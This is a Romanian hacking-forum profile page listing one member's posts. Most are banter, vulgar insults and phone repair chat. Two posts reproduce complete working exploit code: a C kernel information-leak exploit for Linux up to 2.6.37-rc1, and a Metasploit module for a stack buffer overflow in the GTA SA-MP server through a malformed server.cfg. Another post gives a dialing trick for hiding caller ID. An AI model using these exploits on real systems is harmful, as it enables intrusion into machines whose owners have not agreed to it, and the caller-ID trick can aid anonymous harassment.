Jump to content

LLegoLLaS

Active Members
  • Posts

    2060
  • Joined

  • Last visited

  • Days Won

    11

Everything posted by LLegoLLaS

  1. LLegoLLaS

    salut!!

    Bine ai venit.Alte cunostinte?
  2. olol a murit maical gecsan
  3. pentru cei ce nu stiu: pentru a suna cu necunoscut de pe romtelecom fix se formeaza *31* in loc de #31# nu e detectat nici de voce online
  4. rectific: Merge doar la apeluri din retelele mobile
  5. Si eu am primit 'tu-l in urechi
  6. testat;apare Unknown si pe voce online
  7. asta arata bine.PistonHead ala fa-l negru sau gri pentru mine ori da-mi .psd daca vrei.nu-l public nicaieri
  8. parca era Romanian Security Team sau is io beat? scoate fulgerele alea
  9. Alcatel OT355 imei: 353923043354063 provider: 355x-2cbyfr1 .Mersi
  10. este E250DXFGJ1 .Nu e problema cu semnalu'. Pot sa bag orice cartela, pot sa vorbesc.Doar ca imeiul e full 0. Telefonul mai are o problema: cand activez bluetooth-ul ramane la stadiul ''activating''.Sper sa afc rost de alta palca de baza pt el.Nu merge nici cardu' de memorie (s-a dus dracu slotul) si nu tine nici bateria iar cablu de date face nasol
  11. apropo de samsung.Am un SGH E250 si cand scriu *#06# apare imei 000000000000000 :|ce ma-sa sa-i fac?sub baterie nu scrie IMEI-ul sau s-a sters
  12. /* Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit * * ./splitmilk2 leak 134514859 * [\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit * [\m/] by Todor Donev * [x] Leakfile : leak * [x] Reservedsize : 134514859 * [+] Leaking.. =) * ... * * * Greets to prdelka, * for splitmilk.c release, Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit * * Thanks to Tsvetelina Emirska, * that support, respect and inspire me.. * * Yes, I know thats lame, but I was so bored and lazy for better. * * Author: Todor Donev * Author email: [todor.donev@gmail] * */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <termios.h> #include <linux/serial.h> #define DEVICE "/dev/ttyS1" int main(int argc, char* argv[]) { int ret = 0; int i, fd, reservedsize; char* buf; struct serial_multiport_struct buffer; printf("[\\m/] Linux <= 2.6.37-rc1 serial_multiport_struct Info Leak Exploit\n"); printf("[\\m/] by Todor Donev\n"); fd = open(DEVICE, O_RDONLY); if (fd <0) { printf("[-] Error: f0k\n"); exit(-1); } if (argc < 2) { fprintf(stderr, "[!] usg: %s <leakfile> <reservedsize>\n", argv[0]); exit(-1); } if (argc > 2) if ((reservedsize = atoi(argv[2])) == 0) { fprintf(stderr, " [-] Sorry: (atoi) invalid outsize\n"); exit(-1); } fprintf(stderr, " [x] Leakfile: %s\n", argv[1]); fprintf(stderr, " [x] Reservedsize: %u\n", reservedsize); if ((buf = (char *)malloc(reservedsize)) == NULL) { perror("Sorry: (malloc)"); fprintf(stderr, " [-] Sorry: Try again with other output size\n"); exit(1); } memset(&buffer,0,sizeof(buffer)); printf("[+] Leaking.. =)\n"); if((fd = open(argv[1], O_RDWR | O_CREAT, 0640)) == -1){ printf("[-] Error: f0k =(\n"); exit(-1); } for(i=0;i<=reservedsize;i++){ ret += write(fd,&buffer.reserved[i],sizeof(int)); } close(fd); printf("\\o/ %d bytez\n",ret); exit(0); sursa
  13. ce uameni sa-mi bag pula =))spide si exploiter PWNED parca-i vad pe pm "AhEaD domnule hacker imi dai si mie db pls pls?te las s-o futi pe mama,kwe e kkt iti da ban" @AlStar stai asa ca n-ai de unde sa stii ca nu mai apare altu si mai si
  14. challenge accepted: http://i.imgur.com/ftlQE.jpg
  15. E Oust.Cel cacaniu de pe chat care-l pupa la ochiu pe Kabron sa-l faca vip pe chat:)) no offenzza
  16. nasol text jur ceva mai smooth: http://i.imgur.com/Mi5Sp.jpg
  17. @PePe verifica daca sa-au inchis toate procesele yahoo pentru ca de la versiounea 11 sunt 2 procese yahoomessenger.exe. Si da, programu functioneste ok @XP SP3
  18. @plm imi facusem alta parere din posturile tale ... Petzy mai da-l in ma-sa de troll
  19. zi un pret
  20. Takedown (2000) - IMDb restu te descurci
  21. in prmu' rand nu folosesti proxy public.Ti-era lene cu un vpn macar?
  22. ai uitat durata de activitate pe server si experienta. ps: bine ai venit
  23. n-am vrut sa postez da' m-a pleznit un val de ras... "Studied at Scoala de arte si meseri Obarsia de Camp 10" du-te spre ma-ta .Cel mai penal topic din ultimele 6 luni ps: powered by CorNeL by bg_mafia17k 2009-2011
  24. ## # $Id: gta_samp.rb 14076 2011-10-26 22:16:26Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'GTA SA-MP server.cfg Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in GTA SA-MP Server. This buffer overflow occurs when the application attempts to open a malformed server.cfg file. To exploit this vulnerability, an attacker must send the victim a server.cfg file and have them run samp-server.exe. }, 'License' => MSF_LICENSE, 'Author' => [ 'Silent_Dream', # Original discovery, MSF Module, template by mona.py ], 'Version' => '$Revision: 14076 $', 'References' => [ [ 'URL', 'http://www.exploit-db.com/exploits/17893' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x0d\x0a\x1a", 'Space' => 392, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", 'DisableNops' => true, 'MaxSize' => 392, }, 'Targets' => [ [ 'GTA SA-MP (samp-server) v0.3.1.1', { 'Ret' => 0x00429faa, # PUSH ESP; RET (samp-server.exe) } ], ], 'Privileged' => false, 'DisclosureDate' => 'Sep 18 2011', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'server.cfg']) ], self.class) end def exploit buffer = "echo " buffer << rand_text_alpha_upper(379) buffer << [target.ret].pack('V') buffer << payload.encoded file_create(buffer) end end sursa
×
×
  • Create New...